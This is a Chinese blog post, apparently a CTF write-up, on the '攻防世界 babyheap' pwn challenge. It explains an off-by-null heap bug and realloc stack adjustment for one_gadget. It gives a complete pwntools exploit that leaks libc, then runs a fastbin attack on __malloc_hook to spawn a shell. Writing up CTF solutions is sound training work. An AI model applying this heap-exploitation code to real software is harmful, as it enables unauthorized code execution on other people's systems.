【攻防世界】babyheap

最新推荐文章于 2023-06-18 19:18:34 发布
最新推荐文章于 2023-06-18 19:18:34 发布
阅读量191 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/115444314
版权
off by null (libc2.23)
1.程序逆向

在这里插入图片描述
程序在 add 的 read 中存在一个 off by null,同时 add 时无 size 限制,可以直接申请进 unsorted bin 的 chunk,个数足够用。可以 show,free 正常

2.漏洞利用

secret of my heart 一样的利用手法,不再赘述。
记录一下调试 og 的过程。我们可以先尝试所有 og ,如果没有打通的情况下,利用 realloc 调节栈帧,这里可以断在最后触发时的 malloc 处,然后 si 到 execve 处:
在这里插入图片描述
判断的条件即 argv 指向地址的值是否为0,我们调节的是这个过程:
在这里插入图片描述
因为 push 越多 rsp 越小,如果 realloc 加上一些偏移,就会少 push,那么 rsp 则相对于全 push 则增大了少 push 的个数 * 0x8 的地址,所以如果 0 在目标区域的高地址方向,就少 push 几个,就能满足条件。

3.完整exp
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from ctypes import *
context.log_level = 'debug'

binary = './timu'
elf = ELF('./timu')
libc = elf.libc
# libc = cdll.LoadLibrary("./libc.so.6")
context.binary = binary

DEBUG = 1
if DEBUG:
	p = process(binary)
else:
	host = "node2.hackingfor.fun"
	port =  39964 
	p = remote(host,port)
if DEBUG == 2:
	host = ""
	port = 0
	user = ""
	passwd = ""
	p = ssh(host,port,user,passwd)

def dbg():
    gdb.attach(p)
    pause()

l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

menu = "Your choice :"

def cmd(i):
	ru(menu)
	sl(str(i))

def add(size, data='a\n'):
	cmd(1)
	sla("Size: ", str(size))
	sa("Data: ", data)

def dele(idx):
	cmd(2)
	sla("Index: ", str(idx))

def show():
	cmd(3)

add(0x18) #0
add(0x100, 'a'*0xf0 + p64(0x100) + '\n') #1
add(0x100) #2

dele(1)
dele(0)
add(0x18, 'a'*0x18) #0

add(0x80) #1
add(0x10) #3

dele(1)
dele(2)

fake_next_size = 0x90
add(0x80) #1
add(0x100, 'a'*0x68 + p64(0x70) + '\n') #2
add(0x80) #4

dele(2)
show()

ru("3 : ")
libc_base = l64() - libc.symbols['__malloc_hook'] - 0x68
info("libc_base", libc_base)
malloc_hook = libc_base + libc.symbols['__malloc_hook']
realloc = libc_base + libc.sym["__libc_realloc"]

dele(1)

pl = 'a'*0x80 + p64(0) + p64(0x71)
add(0x100, pl + '\n') #1

dele(3)

dele(1)
pl = 'a'*0x80 + p64(0) + p64(0x71) + p64(malloc_hook - 0x23)
add(0x100, pl + '\n') #1

'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

add(0x68) #2
add(0x68, "\x00" * (0x13-0x8) + p64(libc_base + 0x4527a) + p64(realloc) + '\n') #3

# gdb.attach(p, "b *$rebase(0xabd) \n c")
cmd(1)
sla("Size: ", str(0x20))
# dbg()

ia()

在这里插入图片描述

、皮皮鸭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 501
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2069
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
攻防世界(pwn)babyheap(一些常见的堆利用方法)
PLpa的博客
03-22 2012
前言: 此题攻击链路:null_off_by_one修改堆块信息 => UAF泄露libc基址和其他有用信息 => fastbin attack申请堆块到指定地址 => 利用realloc_hook来调整堆栈 => one_gadget get shell。 64位程序,保护全开。 程序提供增删查操作,没有改操作。由于题目已经给了libc-2.23文件(虽然给错了)说明...
攻防世界 进阶 babyheap
yongbaoii的博客
02-21 422
用到的漏洞是off by null 保护绿油油。 菜单,它这说的是2.27heap,但其实给的libc又是2.23的…… create 最多6个chunk,然后 指针存在heap_list哪个数组里面。 read_input 这个里面可以看到,有个明显的off by null。 delete 删的干干净净。 show 平平无奇打印函数。 off by null的利用方式很多,但是总的来讲就是说先泄露libc的地址,然后再制造fastbin_attack。只是中间方法会有很多种,这取决于chunk的申请、释
0ctfbabyheap2017WP——堆溢出fastbin attack初探
GeekCmore的博客
02-18 485
从栈溢出进入堆溢出,漏洞利用的复杂度上了一个大台阶,主要是因为 ptmalloc 内存管理器对于堆管理设计了复杂的数据结构和算法,要想进入堆溢出的学习,就必须厘清它们之间的关系。本文将从一个经典的例子——0ctfbabyheap2017 来介绍一个初级的 fastbin attack 以初探堆溢出攻击。
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Check杂项
11-20
攻防世界Check杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952250
0ctf babyheap
qq_41071646的博客
05-13 474
这个题 一开始 不知道是怎么回事 然后这个程序开了 保护全开 基址随机化 这就要我们自己把libc的基址给泄露出来 泄露的方法我知道的是 把堆 free到 unsortbin的fd和bk指向自身main_arena 然后可以根据 main_arena 的偏移 搞出libc 库 道理都懂 但是怎么做 就不好说了 现在这里就有一道题 典型的菜单题 然后 看一下大概内容 有没...
0ctf 2017 babyheap writeup
jmp esp
03-26 6281
前言坑比的我比赛的时候没有做。。第二天有课,赛后看了看,题目其实没啥太多难度,可能也就是细节上需要注意一下吧题目题目功能简单介绍一下题目功能,因为我本机是用的linux,ida在虚拟机里,ida的复制又不是特别方便,所以我就不复制分析的情况了,具体分析自己做一下练习一下也比较好,就把大致的情况说明一下。首先是主菜单===== Baby Heap in 2017 ===== 1. Allocate 2
actf_2019_babyheap题解析
qq_29317353的博客
06-18 264
再次创建一个0x10大小的堆块,会从fastbin里面拿出一个0x10大小的堆块就是index3会覆盖掉index0的地址根据malloc的分配机制,所以把函数的指针改为system把content的指针改成/bin/sh就完成了UAF漏洞利用的一个过程。struct chunk是0x10的堆结构体,content chunk是用来存放数据的。查看printf_out,发现利用点。思路创键3给堆块,大小相同,防止合并。由于是UAF漏洞先看,free。看看分配堆块的地方,看注释。mian函数分析,见注释。
0ctf2018-babyheap调试记录fastbin-attack,off-by-one
weixin_30596165的博客
11-03 104
查看文件格式以及保护开启情况。发现为64位程序,符号被剥离,动态链接程序且题目提供给了libc。保护全开,猜想可能是fast attack加上malloc_hook利用(毕竟去年这题是这个利用,肯定先往这边想) 简单的运行程序,发现是常规的菜单类题目,功能有申请内存(alloc)、更新(update)、删除(delete)、查看(view)、退出。我们每个功能走...
攻防世界PWN之Noleak(一题学了好多知识)题解
seaaseesa的博客
11-13 3714
Noleak 本题需要用到的知识有:malloc_hook、unsorted bin unlink、fastbin attack、partial write bypass PIE 首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习 Malloc hook 我们看如下代码 #include&...
星盟-pwn-babyheap
qq_65147345的博客
08-01 192
1. 堆重叠获取libc_base地址 2. 使用unsorted attack更改global_max_fast,使chunk进入fastbin 3. 使用fastbin attack更改malloc_hook为one_gadget
babyheap_0ctf_2017
m0sway的博客
11-25 522
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
2017 0ctf babyheap
Grxer的博客
03-21 124
刚开始的init_my会利用/dev/urandom随机函数用mmap随机映射一块内存给我们存放指针,没有了确定地址,我们就不好去构成unlink攻击allocate()根据我们输入的size构成如下一个结构体,把指针放在mmap的堆上fill()也会根据我们的size进行读写,任意堆溢出,这就好办了freechunk()挺好的,该置零的都置零。
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3776
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
攻防世界 easyphp
最新发布
09-11
EasyPHP是一个用于Windows操作系统的开发环境,它集成了Apache服务器、MySQL数据库和PHP解释器,使得搭建和管理网站变得更加简单。在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞、密码学等。参与者需要通过解决这些挑战来学习和提高自己的网络安全技能。同时,攻防世界也提供了一些教程和文章,帮助新手入门并引导他们深入理解攻击和防御的原理。 对于初学者来说,攻防世界的easyphp环境可以作为一个很好的起点,因为它提供了一个集成的开发环境,使得学习和实践变得更加方便。通过解决平台上的题目和挑战,初学者可以逐渐熟悉常见的安全漏洞和攻击技术,并学会如何进行相应的防御措施。 希望以上信息对你有所帮助!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值